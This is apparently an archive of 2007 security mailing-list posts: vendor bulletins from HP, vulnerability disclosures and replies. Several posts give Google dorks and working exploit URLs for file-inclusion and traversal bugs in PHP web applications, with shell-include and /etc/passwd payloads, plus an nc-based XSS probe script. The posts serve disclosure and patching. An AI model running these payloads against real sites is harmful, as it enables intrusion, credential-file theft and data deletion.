Re: Php Nuke POST XSS on steroids
Paul Laudanski wrote: > I tried both your scripts at a few locations, and all I get back is this [cut] hi Paul, long time from ccc : ) it happens because http headers must be on a single line, it's a formatting issue (my fault, i used to put a link to a plain text version but this time i forgot about it), i've just created a txt version of the advisory available here: http://phpfi.com/214668 it should be more usable, i dunno when the demos will stop working on phpnuke.org so i've asked wisec to upload this video since www.ush.it has bandwidth issues http://www.wisec.it/ush/phpnukexss.html obviously to bypass the anti-CSRF filter you have to mix the XSS with the import_request_variables() trick (this doesn't work on phpnuke.org because they have globals on, this is why i choose that domain) consider that import_request_variables() will allows you to do much more than an XSS, this is just an example advisory on an example product See you, Francesco `ascii` Ongaro http://www.ush.it/
Remote File Include In Script moodle-1.7.1
By Hasadya Raed Contact : RaeD [At] BsdMail [Dot] Com -- Script : moodle-1.7.1 Dork : "Copyright (c) moodle" -- B.Files : utfdbmigrate.php filter.php -- Exploits : http://www.Victim.com/moodle/admin/utfdbmigrate.php?cmd=[Shell-Attack] http://www.Victim.com/moodle/filter.php?cmd=[Shell-Attack] -- ___ Get your free email from http://bsdmail.com
Re: PHP-Nuke <= 8.0 Cookie Manipulation (lang)
[EMAIL PROTECTED] wrote: Patch: } elseif (isset($lang)) { if (eregi('[A-Za-z]', $lang)) { if (file_exists("language/lang-".$lang.".php")) { include_once("language/lang-".$lang.".php"); $currentlang = $lang; }else { include_once("language/lang-english.php"); $currentlang = "english"; } }else { include_once("language/lang-english.php"); $currentlang = "english"; } } else { / Best Regards Aleksandar Programmer and Web Developer /// Building on your patch you'd want to incorporate basename(). You never want to accept directory traversal attempts into variables. Paul Laudanski, CastleCops http://www.linkedin.com/pub/1/49a/17b Submit Phish: www.castlecops.com/pirt www.castlecops.com | de.castlecops.com | wiki.castlecops.com
GuppY v4.0 remote del files/index
* GuppY v4.0 remote del files/index * By : sn0oPy * Risk : high * site : http://www.freeguppy.org/ * Dork : inurl:"/guppy/index.php" * exploit : just add install/install.php to the script folder http://www.target.ma/guppy/install/install.php choose "Installation propre" >>> next >>> choose "Suppression des fichiers d'installation" >>> next >>> * contact : [EMAIL PROTECTED] * greetz : [subzero], Avg Team(forums.avenir-geopolitique.net). * Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2728
[security bulletin] HPSBUX02196 SSRT071318 rev.2 - HP-UX Java (JRE and JDK) Remote Execution of Arbitrary Code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00876579 Version: 2 HPSBUX02196 SSRT071318 rev.2 - HP-UX Java (JRE and JDK) Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-03-09 Last Updated: 2007-03-09 Potential Security Impact: Remote execution of arbitrary code. Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Java Runtime Environment (JRE) and Java Developer Kit (JDK) may allow a remote user to execute arbitrary code. References: CVE-2007-0243, CVE-2006-6745, CVE-2006-6731 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11 and B.11.23 running Java Runtime Environment (JRE) and Java Developer Kit (JDK): Release 5.0.05 i.e., Release 1.5.0.05, Release 1.4.2.11 and earlier, Release 1.3.1.19 and earlier. BACKGROUND The Sun Java Runtime Environment (JRE) and Java Developer Kit (JDK) contain multiple vulnerabilities that can allow a remote, unauthenticated user to execute arbitrary code on a vulnerable system. AFFECTED VERSIONS NOTE: To determine if a system has an affected version, search the output of "swlist -a revision -l fileset" for an affected fileset. Then determine if a fixed revision or applicable patch is installed. HP-UX B.11.11 HP-UX B.11.23 === Jpi14.JPI14-COM Jpi14.JPI14-COM-DOC Jpi14.JPI14-IPF32 Jpi14.JPI14-PA11 Jdk14.JDK14-COM Jdk14.JDK14-DEMO Jdk14.JDK14-IPF32 Jdk14.JDK14-IPF64 Jdk14.JDK14-PA11 Jdk14.JDK14-PA20 Jdk14.JDK14-PA20W Jdk14.JDK14-PNV2 Jdk14.JDK14-PWV2 Jre14.JRE14-COM Jre14.JRE14-COM-DOC Jre14.JRE14-IPF32 Jre14.JRE14-IPF32-HS Jre14.JRE14-IPF64 Jre14.JRE14-IPF64-HS Jre14.JRE14-PA11 Jre14.JRE14-PA11-HS Jre14.JRE14-PA20 Jre14.JRE14-PA20-HS Jre14.JRE14-PA20W Jre14.JRE14-PA20W-HS Jre14.JRE14-PNV2 Jre14.JRE14-PNV2-H Jre14.JRE14-PWV2 Jre14.JRE14-PWV2-H action:install revision 1.4.2.12.00 or subsequent. Jdk15.JDK15-COM Jdk15.JDK15-DEMO Jdk15.JDK15-IPF32 Jdk15.JDK15-IPF64 Jdk15.JDK15-PA20 Jdk15.JDK15-PA20W Jdk15.JDK15-PNV2 Jdk15.JDK15-PWV2 Jre15.JRE15-COM Jre15.JRE15-COM-DOC Jre15.JRE15-IPF32 Jre15.JRE15-IPF32-HS Jre15.JRE15-IPF64 Jre15.JRE15-IPF64-HS Jre15.JRE15-PA20 Jre15.JRE15-PA20-HS Jre15.JRE15-PA20W Jre15.JRE15-PA20W-HS Jre15.JRE15-PNV2 Jre15.JRE15-PNV2-H Jre15.JRE15-PWV2 Jre15.JRE15-PWV2-H action:install revision 1.5.0.06 or subsequent END AFFECTED VERSIONS NOTE: The version number returned by "$java -version" and the version returned by swlist for Java are different. For example, when the $java -version is 5.0.6 the version shown by swlist is 1.5.0.06. RESOLUTION HP is providing the following Java updates to resolve the JRE potential vulnerability. The updates are available from: http://www.hp.com/go/java The HP website mentions Java 5.0, which can be recognized from the swlist -l fileset return value of 1.5.0.01.06. These issues are addressed in the following versions of the HP Java: * JDK and JRE 1.5.0.6 or subsequent, * SDK and JRE 1.4.2.12 or subsequent, * SDK and JRE 1.3.1.20 or subsequent. If the latest version of Java is installed, older versions of Java may remain installed on the system. If these versions of Java are not needed, you may wish to remove them. MANUAL ACTIONS: Yes - Update For Java 1.5.0.00.00, update to Java 1.5.0.06 or subsequent. ->For Java 1.4.2.11 and earlier, update to revision 1.4.2.12 or subsequent. For Java 1.3.1.19 or earlier, update to revision 1.3.1.20 so subsequent. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa HISTORY: Version: 1 (rev.1) 06 March 2007 Initial release Version: 2 (rev.2) 09 March 2007 Corrected typo in Manual Actions, in SSRT #. Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and p
RIM BlackBerry Pearl 8100 Browser DoS
RIM BlackBerry Pearl 8100 Browser DoS -- 12 March 2007 Summary: A vulnerability has been discovered that could impact upon the availability of the BlackBerry 8100 Wireless handheld (v4.2.0.51). It is possible for a remote attacker to construct a WML page that contains an overly long string value within a link (e.g.: ). Should the page or link be accessed by BlackBerry devices, this leads to a temporary Denial of Service within the 4thPass browser component on the device, and temporary device inoperability. Normal functionality will be returned to the browser / device after an amount of time relative to the size of the link supplied, or by physically removing and reinserting the battery thereby creating a reset. Business Impact: Exploitation of this issue can lead to a loss of device functionality. Affected Product(s): The BlackBerry 8100 (Pearl) handheld device (v4.2.0.51) Remediation: Upgrade to vendor patch 4.2.1 Additional details of this vulnerability are available from the vendor at www.blackberry.com/security/news.jsp Credit: Michael Kemp (www.clappymonkey.com)
Fantastico In all Version Cpanel 10.x <= local File Include
## Fantastico In all Version Cpanel 10.x <= local File Include ##to the Note : Preparations php.ini in Cpanel hypothetical and They also in all WebServer Must provide username And pass and login :2082 To break the strongest protection mod_security & safe_mode:On & Disable functions : All NONE Vulnerable Code ( 1 ) : if(is_file($userlanguage)) { include ( $userlanguage ); In http://xx.com:2082/frontend/x/fantastico/includes/load_language.php Exploit 1 : http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php id uid=32170(user) gid=32170(user) groups=32170(user) Exploit 2 : http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd ### Vulnerable Code ( 2 ) : $localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php"; if (is_file($localmysqlconfig)) { include($localmysqlconfig); in http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php And also many of the files of the program Exploit : First Create directory Let the name (/includes/) and upload Shell.php in (/includes/) Then rename mysqlconfig.local.php D: :::xploit http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/ ### Discoverd By : cyb3rt & 020 ### Special Greetings :_ Tryag-Team & 4lKaSrGoLd3n-Team ###
Remote File Include In ClipShare.v1.5.3
By Hasadya Raed Contact : RaeD [At] BsdMail [Dot] Com / GunMan_Pump [At] Hotmail [Dot] Com Script : ClipShare.v1.5.3 Dork : "Copyright © 2006 Powered By Clip-Share.Com. All rights reserved" B.File : adodb-connection.inc.php Exploit : http://www.Victim.com/Path/include/adodb-connection.inc.php?cmd=[Shell-Attack] -- ___ Get your free email from http://bsdmail.com
Re: Php Nuke POST XSS on steroids
ascii wrote: Php Nuke POST XSS on steroids Name Php Nuke POST XSS on steroids Systems Affected PHP >=4.0.7 <=5.2.1, GLOBALS OFF, Php Nuke 8.0 and others (partially verified) Severity Medium Vendorhttp://php nuke.org/ Advisory http://www.ush.it/2007/03/09/php-nuke-wild-post-xss/ Authors Francesco `ascii` Ongaro ([EMAIL PROTECTED]) Stefano `wisec` di Paola ([EMAIL PROTECTED]) Date 20070307 --- >8 --- >8 --- >8 --- >8 --- testsuite.sh --- >8 --- >8 --- >8 --- >8 #!/bin/bash cat > REQ << TOKEN POST /modules.php?name=Downloads&d_op=search&query= HTTP/1.1 Host: www.phpnuke.org User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.2) Gecko/20070220 Firefox/2.0.0.2 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Connection: close Referer: http://www.phpnuke.org/modules.php?name=Downloads Cookie: lang=english Content-Type: application/x-www-form-urlencoded Content-Length: 23 query=token<>token TOKEN cat REQ | nc www.phpnuke.org 80 -vvv --- >8 --- >8 --- >8 --- >8 --- --- >8 --- >8 --- >8 --- >8 $ ./testcase | grep "token<>token" DNS fwd/rev mismatch: www.phpnuke.org != ev1s-67-15-16-43.ev1servers.net www.phpnuke.org [67.15.16.43] 80 (http) open http://www.ush.it/ I tried both your scripts at a few locations, and all I get back is this: 400 Bad Request Bad Request Your browser sent a request that this server could not understand. Request header field is missing ':' separator. Gecko/20070220 Firefox/2.0.0.2
Re: Wiki Remote Authentication Bypass Vulnerability
This is the designed behavior of the application, not an "exploit" as you claim. In addition to that, the syntax used in your example URL's is specific to MediaWiki, and not common amongst all wiki apps, as you claim. Furthermore, this "exploit" does not work "100% of the time" - even if this could be called an exploit, which it clearly is not, protecting an entry and configuring levels of access are relatively common and simple tasks for Wiki administrators. Your claim that this is an access validation error is simply wrong, and is akin to saying that being able to write to a file which a user intentionally sets to mode 0777 is an error. - Matt [EMAIL PROTECTED] wrote: Wiki Remote Authentication Bypass Vulnerability The Exploit Works 100 % of the time. It really is up to the admin to add security like locking a page to prevent editing. There are Two ways of having this Exploit work. One is simply add the code (example 1) after the Page you wanna test or if that dosent work, add Code (example 2) and Exploit code after the new pages Name! Anyone using any type of Wiki project is vulnerable. Successfully exploiting this issue allows remote attackers to gain remote administrative access to the vulnerable sites Pages. Attackers can use a browser to exploit this issue. Hackers Center Security Group (http://www.hackerscenter.com) Credit: Doz Class: Access Validation Error Remote: Yes Vendor: http://www.wiki.org/ Version: N/A Exploit: ?action=edit Example 1: http://www.Site.com/wiki/Main_Page?action=edit Example 2: http://www.Site.com/wiki/Hacked?action=edit Proff of Concept: (Concealed) Security researcher? Join us: mail Zinho at zinho at hackerscenter.com -- /* * Matt D. Harris <[EMAIL PROTECTED]> * Solitox Networks - Lead Project Engineer */
AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= | |AssetMan 2.4a <= (download_pdf.php) Remote File Disclosure Vulnerability | |Script: AssetMan | |Verson: 2.4a | |URL: http://www.bctree.com/~assetman/assetman-2.4a.zip | |Discover: BorN To K!LL | +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= | |Bug in: |download_pdf.php | |Code: |readfile($_GET["pdf_file"]); | +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= | |ExploiT: |~ |wWw.SiTe.cOm/[path]/download_pdf.php?pdf_file=../../../../etc/passwd | |+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= | |GreeTz 2: |Dr.2 - str0ke - AsbMay . | |KuW SeC AsbMay's Group | +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= _ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Remote File Include In Script PHP Photo Album
By Hasadya Raed Contact : [EMAIL PROTECTED] - Script : PHP Photo Album Dork : "Powered by PHP Photo Album" - B.File : common.php -- Exploit : http://www.Victim.com/Path_Script/common.php?db_file=[Shell-Attack] -- ___ Get your free email from http://bsdmail.com
Wiki Remote Authentication Bypass Vulnerability
Wiki Remote Authentication Bypass Vulnerability The Exploit Works 100 % of the time. It really is up to the admin to add security like locking a page to prevent editing. There are Two ways of having this Exploit work. One is simply add the code (example 1) after the Page you wanna test or if that dosent work, add Code (example 2) and Exploit code after the new pages Name! Anyone using any type of Wiki project is vulnerable. Successfully exploiting this issue allows remote attackers to gain remote administrative access to the vulnerable sites Pages. Attackers can use a browser to exploit this issue. Hackers Center Security Group (http://www.hackerscenter.com) Credit: Doz Class: Access Validation Error Remote: Yes Vendor: http://www.wiki.org/ Version: N/A Exploit: ?action=edit Example 1: http://www.Site.com/wiki/Main_Page?action=edit Example 2: http://www.Site.com/wiki/Hacked?action=edit Proff of Concept: (Concealed) Security researcher? Join us: mail Zinho at zinho at hackerscenter.com
Re[2]: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues
Dear Thor (Hammer of God), You are wrong at least for Windows XP/2003. There is a common temporary directory %WINDIR%\Temp It's used as a %TEMP% if application is launched without local logon, e.g. system service. For example, services launched with LocalSystem account will have this environment variables: SystemRoot=C:\WINDOWS TEMP=C:\WINDOWS\TEMP TMP=C:\WINDOWS\TEMP USERPROFILE=C:\Documents and Settings\LocalService You can find it's really used, because it's never empty. I see, e.g. files related to different Intel drivers, VMWare, Microsoft .Net framework, Exchange and Sharepoint. Also, I remember I had problems with securing ABN AMRO Bank client software installation, because it uses %WINDIR%\Temp for some reason. And now is most exciting: Users have permission to create files in this directory, that is pre-open attack is possible. --Saturday, March 10, 2007, 7:28:27 PM, you wrote to bugtraq@securityfocus.com: THoG> Apps utilizing temporary files should always use the TEMP or TMP environment THoG> variables, not a hard-coded path. And by default, each user has their own THoG> temp directory created (in XP/Server it is "\Documents and THoG> Settings\username\Local Settings\temp" and in Vista it is THoG> "\Users\username\AppData\Local\Temp") that only they have permissions to THoG> (with SYSTEM and Administrators, of course). It's not like there is some THoG> global "Full Control" temp directory created by default. THoG> t THoG> - Original Message - THoG> From: "Roger A. Grimes" <[EMAIL PROTECTED]> THoG> To: "Tim" <[EMAIL PROTECTED]> THoG> Cc: ; THoG> THoG> Sent: Friday, March 09, 2007 9:42 AM THoG> Subject: RE: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file THoG> management security issues THoG> So, let me get this. An app storing sensitive data doesn't make its own THoG> temp storage folders in a secure location, and instead relies upon one THoG> of the few folders in Windows that all users have Full Control to, and THoG> this is a Windows problem? In Linux, if an app uses \tmp, is that a THoG> Linux issue? THoG> Sounds like a developer issue to me. THoG> Roger THoG> -Original Message- THoG> From: Tim [mailto:[EMAIL PROTECTED] THoG> Sent: Friday, March 09, 2007 11:20 AM THoG> To: Roger A. Grimes THoG> Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk THoG> Subject: Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file THoG> management security issues THoG> I find your assessment somewhat short-sighted. I have conducted code THoG> reviews on several commercial apps which use C:\TEMP in very insecure THoG> ways to store sensitive data. It seems some of these attacks would be THoG> possible in those situations. THoG> Sure, Windows is already pathetically insecure against an attackers THoG> already on the local system, but this would be yet another attack THoG> vector. THoG> tim -- ~/ZARAZA http://securityvulns.com/ ÝÍÈÀÊàì - ïî ìîðäå! (Ëåì)
[security bulletin] HPSBUX02129 SSRT061149 rev.2 - HP-UX running SLP, Remote Unauthorized Access
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00717872 Version: 2 HPSBUX02129 SSRT061149 rev.2 - HP-UX running SLP, Remote Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-03-05 Last Updated: 2007-03-05 Potential Security Impact: Remote Unauthorized Access Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified in HP-UX when running Service Locator Protocol (SLP).The vulnerability could be exploited by a remote user of Service Locator Protocol (SLP) for unauthorized access. References: SUSE-SA:2005:015 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23 BACKGROUND SLP implementation on HP-UX is based on OpenSLP version 0.8.0 developed by Caldera Systems, Inc. To determine if an HP-UX system has an affected version, search the output of "swlist -a revision -l fileset" for one of the filesets listed below. For affected systems verify that the recommended action has been taken. AFFECTED VERSIONS ->HP-UX B.11.11 === upgrade_SLP.INETSVCS-RUN action: install revision 1.2 or subsequent ->URL: http://software.hp.com HP-UX B.11.23 === InternetSrvcs.INETSVCS2-RUN action: install PHNE_33508 or subsequent END AFFECTED VERSIONS RESOLUTION HP has made the following patch and web upgrade available to resolve this issue. B.11.23 PHNE_33508 or subsequent The patch can be retrieved from: http://itrc.hp.com ->The B.11.11 SLP Revision 1.2 update can be retrieved from: http://software.hp.com PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa MANUAL ACTIONS: Yes - Update HP-UX B.11.11 Update to HP-UXSLP Revision 1.2 or subsequent HP-UX B.11.23 No manual actions HISTORY: Version: 1 (rev.1) 25 September 2006 Initial release Version: 2 (rev.2) 06 March 2007 Updated web upgrade location for B.11.11 Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all u
Re: Re[2]: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues
2 things: My point is what apps SHOULD do- use the "user" temp variable, not the system temp variable if you want to easily have inherited, user-based security. Not sure why your ABN AMRO client makes it files in %WINDIR%\temp, but that's not necessary. It probably requires local admin too, given that. Secondly, I said there is not a "global Full Control" directory, and there is not. The %WINDIR%\Temp directory has "special" permissions. For users, it is only Traverse Folder/Execute File, Create Files/Write Data, and Create Folders/ Append Data. Not List Folder/ Read Data, no read add tributes, not write attributes, not delete, etc, etc. And all subfolders in Temp inherit those permissions. I know it's used extensively by system and admin installation, but that's not my point at all. Someone chimed in about C:\temp and sensitive data, and blah blah, so I simply stated that user variables usage for temp files mitigate that. Also, there is no "Global Full Control" directory created by default temp files and there's not. Sure you can create on if you want and use that (which obviously someone did for C:\temp because it does not exist by default) but that's more of Roger's point in that "if you do things insecurely and without thinking, then someone can take advantage of that." And I think he's right on that. But as Mark said, the overall issue is interesting at some level, particularly if you can leverage it even with limited permissions in \windows\temp, though I also think many many things must go "wrong" first. But, that being said, I've seen enough of your posts to know that you know what you are doing, so I have respect for your work even though I may not totally agree all the time. t Learn to secure your Microsoft installations with Tim Mullen's "Microsoft Ninjitsu Black Belt Edition" at Blackhat Vegas. Registration open now. http://www.blackhat.com/html/bh-usa-07/train-bh-us-07-tm-ms-bbe.html - Original Message - From: "3APA3A" <[EMAIL PROTECTED]> To: "Thor (Hammer of God)" <[EMAIL PROTECTED]> Cc: ; "Roger A. Grimes" <[EMAIL PROTECTED]>; "Tim" <[EMAIL PROTECTED]>; Sent: Saturday, March 10, 2007 2:32 PM Subject: Re[2]: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues Dear Thor (Hammer of God), You are wrong at least for Windows XP/2003. There is a common temporary directory %WINDIR%\Temp It's used as a %TEMP% if application is launched without local logon, e.g. system service. For example, services launched with LocalSystem account will have this environment variables: SystemRoot=C:\WINDOWS TEMP=C:\WINDOWS\TEMP TMP=C:\WINDOWS\TEMP USERPROFILE=C:\Documents and Settings\LocalService You can find it's really used, because it's never empty. I see, e.g. files related to different Intel drivers, VMWare, Microsoft .Net framework, Exchange and Sharepoint. Also, I remember I had problems with securing ABN AMRO Bank client software installation, because it uses %WINDIR%\Temp for some reason. And now is most exciting: Users have permission to create files in this directory, that is pre-open attack is possible. --Saturday, March 10, 2007, 7:28:27 PM, you wrote to bugtraq@securityfocus.com: THoG> Apps utilizing temporary files should always use the TEMP or TMP environment THoG> variables, not a hard-coded path. And by default, each user has their own THoG> temp directory created (in XP/Server it is "\Documents and THoG> Settings\username\Local Settings\temp" and in Vista it is THoG> "\Users\username\AppData\Local\Temp") that only they have permissions to THoG> (with SYSTEM and Administrators, of course). It's not like there is some THoG> global "Full Control" temp directory created by default. THoG> t THoG> - Original Message - THoG> From: "Roger A. Grimes" <[EMAIL PROTECTED]> THoG> To: "Tim" <[EMAIL PROTECTED]> THoG> Cc: ; THoG> THoG> Sent: Friday, March 09, 2007 9:42 AM THoG> Subject: RE: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file THoG> management security issues THoG> So, let me get this. An app storing sensitive data doesn't make its own THoG> temp storage folders in a secure location, and instead relies upon one THoG> of the few folders in Windows that all users have Full Control to, and THoG> this is a Windows problem? In Linux, if an app uses \tmp, is that a THoG> Linux issue? THoG> Sounds like a developer issue to me. THoG> Roger THoG> -Original Message- THoG> From: Tim [mailto:[EMAIL PROTECTED] THoG> Sent: Friday, March 09, 2007 11:20 AM THoG> To: Roger A. Grimes THoG> Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk THoG> Subject: Re: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file THoG> management security issues THoG> I find your assessment somewhat short-sighted. I have conducted code THoG> reviews on several commercial apps which use C:\TEMP in very insecure THoG